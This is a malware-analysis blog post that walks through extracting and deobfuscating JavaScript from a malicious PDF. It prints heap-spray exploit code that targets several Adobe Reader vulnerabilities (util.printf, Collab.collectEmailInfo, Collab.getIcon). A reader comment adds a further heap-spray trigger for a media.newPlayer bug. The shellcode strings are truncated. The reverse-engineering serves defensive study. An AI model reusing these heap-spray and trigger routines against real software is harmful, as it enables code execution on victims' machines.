Reversing the Adobe Reader Exploits – Part 1
Update: Turns out that the sample I was working with is not the new 0-day exploit described here. Once I get a sample of the new PDF exploit I’ll write a new post describing how it works (or read parody’s comment below for a preview).
On December 15, Adobe released a security advisory stating that a new vulnerability has been found in Adobe Reader that could potentially execute arbitrary code. Instead of studying for my last two finals, I decided to try my hand at reversing a PDF exploit and figuring out what this new vulnerability is and what the wild malware is doing with it.
So first off, I have not looked into PDF exploits before and really don’t know much about the PDF format other than skimming through previous exploit advisories. First off, by reading the advisory you can determine that this is a JavaScript exploit since disabling JavaScript is the current solution until Adobe releases a patch. I found a really useful reversing cheat sheet a few weeks ago and I started off by finding a few tools that looked useful for decoding a PDF file and extracting the JavaScript (PDF Tools Suite and Malzilla). From here I’ll proceed to extract the encoded JavaScript from the PDF and work on figuring out what the code does.
Extracting JavaScript from a PDF
The first tool we’ll be using is pdf-parser.py from the PDF Tools suite. This script will search through a PDF file’s sections, display raw data in the sections, and decode JavaScript streams if they are encoded (FlateDecode). Running pdf-parser.py on the malicious pdf without any options returns a list of all sections in the JavaScript file… which isn’t very useful to us since we are only interested in the JavaScript section that hopefully contains the exploit. Instead, you can run pdf-parser.py -s javascript malware.pdf and the script will only return the JavaScript sections. For the pdf in this example it returns:
obj 7 0 Type: Referencing: 10 0 R [(1, '\n'), (2, '<<'), (2, '/JavaScript'), (1, ' '), (3, '10'), (1, ' '), (3, ' 0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '>>'), (1, '\n')] << /JavaScript 10 0 R >> obj 14 0 Type: Referencing: 13 0 R [(1, '\n'), (2, '<<'), (2, '/JS'), (1, ' '), (3, '13'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/S'), (1, ' '), (2, '/JavaScript'), (1, '\n'), (2, '>>'), (1, '\n')] << /JS 13 0 R /S /JavaScript >>
Okay, so I’m lazy and don’t want to go read through the PDF reference manual, so we’re just going to figure out what to do by brute force and some educated guessing. First off, there is an “object” command in pdf-parser.py that looks like it should return the object referenced by each section. Running that on 7 and 14 (from the above “obj 7 0″ output) return what looks like another section with just a referencing number again. So scratch that, let’s try running the object command on the referencing numbers above (10, 13). Running this on 10 gives us:
obj 10 0 Type: Referencing: 14 0 R <> << /Names [(a) 14 0 R] >>
Which isn’t too interesting, but running the object command on 13 gives us what we want:
obj 13 0 Type: Referencing: Contains stream <> << /Length 20297 >>
Okay, this looks like the JavaScript stream of the file. Now, how do we actually get to the code? After fiddling around with the script, it turns out we want to enable the raw mode and enable the filter which decodes the data. After doing this we get the actual JavaScript source code:
p ="";
var s = " 10{ 118{ 97{ ............. lots of shellcode!";
ib=eval;
vk=ib;
p ="";
s=s.replace(/[A-Z]/g,function (sda){}).split("{ ");
var JknB="f"+"o";
var qqeerR="r";
var qrt="("+"i";
var HHjdxc="="+"0";
var uiuTW="i"+"<";
var Vqweqwet="l"+"en";
var df="+"+"+";
var TTyreQ="=S";
var nmMJ="o";
var tyuid="o";
var YUiotr="["+"i]"+")"+";"+"}";
vk(JknB+qqeerR+...........);
vk(p);
Okay, this looks more like the obfuscated shellcode that we are looking for! Skimming over this code, it looks like everything has been obfuscated by randomizing variable names and adding extraneous operations, except for the string replace and split functions and the eval function. The line with the string replace and split functions will parse the insanely long string at the top and get it into something closer to the shellcode. The eval line is key, eval is a function in JavaScript that executes a string of commands… so in this case the call to vk will evaluate some string that contains commands.
Decoding the Shellcode
At this point, we have a bunch of obfuscated JavaScript code that is going to decrypt a string into some command and then execute the command. We want to know what the command that will be executed is, and there are basically two methods for figuring this out – replace the eval call with a document.write() or use the Malzilla tool. I’m going to go with the Malzilla tool since it was linked to by the cheat sheet website up above and I like learning new things.

Open Malzilla, go to the “Decoder” tab at the top, and paste in the JavaScript code we have from before. Next, click the “Run Script” button and Malzilla will run the JavaScript code in its own interpreter and store anything that was executed by the eval function. A new window will open with the results; in our case there are two results since there were two lines where eval() was run. The first result is below:
for(i=0;i<s.length;i++)
{
p+=String.fromCharCode(s[i]);
}
This code converts the string s from Unicode to charaters and stores the result in string p. The second result will be what is stored in p based on the original code vk(p).
var arry = new Array();
function fix_it(yarsp, len)
{
while (yarsp.length*2<len){yarsp += yarsp;}
yarsp = yarsp.substring(0,len/2);
return yarsp;
}
var version = app.viewerVersion;
if (version > 8 )
{
var payload = unescape("%uC033%u8B64........");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
var num = 1299999999999999999988........;
util.printf("%45000f",num);
}
if (version < 8 )
{
var addkk = unescape("%uC033%u8B64........");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;
for (var count=0;count < count2;count++)
{
mem_array[count] = yarsp + addkk;
}
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length < 44952) overflow += overflow;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}
if (version < 9.1)
{
if (app.doc.Collab.getIcon){
var vvpethya =unescape("%uC033%u8B64........");
var hWq500CN = vvpethya.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + vvpethya;}
var tUMhNbGw = unescape("%09");
while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw;
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
So what was only 21 lines and two eval() statements has ballooned into this, which would have been executed by the second eval if we were running in Adobe Reader. I’ve put a copy on Pastebin for easier reading.
Analyzing the Shellcode
If you skim through the latest version of the shellcode, it can quickly be determined that the malware checks which version of Adobe Reader it is running on and executes an exploit based on that. There is another Unicode encoded string (%uC033%u8B64…) that is the same in all three exploits which contains the actual shellcode that will be executed on the host machine.
Version 8 and Higher
The first branch targets Adobe Reader versions 8 and higher and exploits CVE-2008-2992 which is a vulnerability in the util.printf function (which is the last line in this branch… a quick Google search determined which vulnerability was being exploited). Coincidently, it turns out the malware is using a modified version of Debasis Mohanty’s demonstration code.
Version 8 and Lower
The second branch targets Adobe Reader versions lower than 8 and exploits APSA08-01 which is a vulnerability in the Collab.collectEmailInfo() function (again, the last line of this branch). This code is also modified from published exploit code.
Version Lower than 9.1
The second branch targets Adobe Reader versions less than 9.1 and exploits CVE-2009-0927 which is a vulnerability in the app.doc.Collab.getIcon() function (again, the last line of this branch).
What’s Next
I actually need to study for my finals, so I’m going to have to quit here. The next post will most likely start with trying to figure out what the Unicode encoded string represents (teaser, I’ve already found a URL and I assume the rest is ASM) and then do some dynamic analysis of actually opening the malicious PDF and seeing what actions it takes. Feel free to post any questions or corrections in the comments!
Nice work! :]
The sample doesn’t look to be the exploit for the new bug against adobe though.
Sample I have uses the following javascript to trigger the new bug.
var memory;
if(app.viewerVersion >=
{
function NS() {
var nop = unescape(’%u9090%u9090′);
var sc = unescape(’%u6090%uec81%u03e8%u0000%uc083%u8364….%u0000%u0000′);
while(nop.length <= 0×10000/2) nop+=nop;
nop=nop.substring(0,0×10000/2 – sc.length);
memory=new Array();
for(i=0;i<0×1000;i++) {
memory[i]=nop + sc;
}
}
NS();
try {this.media.newPlayer(null);} catch(e) {}
util.printd("p@111111111111111111111111 : yyyy111", new Date());
…
good luck with your finals :]
parody is right, your example is for the util.printf vulnerability (CVE-2008-2992)
His example is an exploit for the new Adobe 0-day. You can use my PDF-tools to create a PDF sample with his JS code.
If you don’t have python installed, another option for extracting the javascript is to use pdftk.
CMD:
pdftk malicious_file.pdf output out.pdf uncompress
Then open the out.pdf in a text editor such as notepad and the copy out the javascript.
Cool write up.
@arebc
Here’s a link to pdftk:
http://www.accesspdf.com/pdftk/
@arebc
Anyone have a PDF example of this we can use for testing the blacklist framework in Acrobat?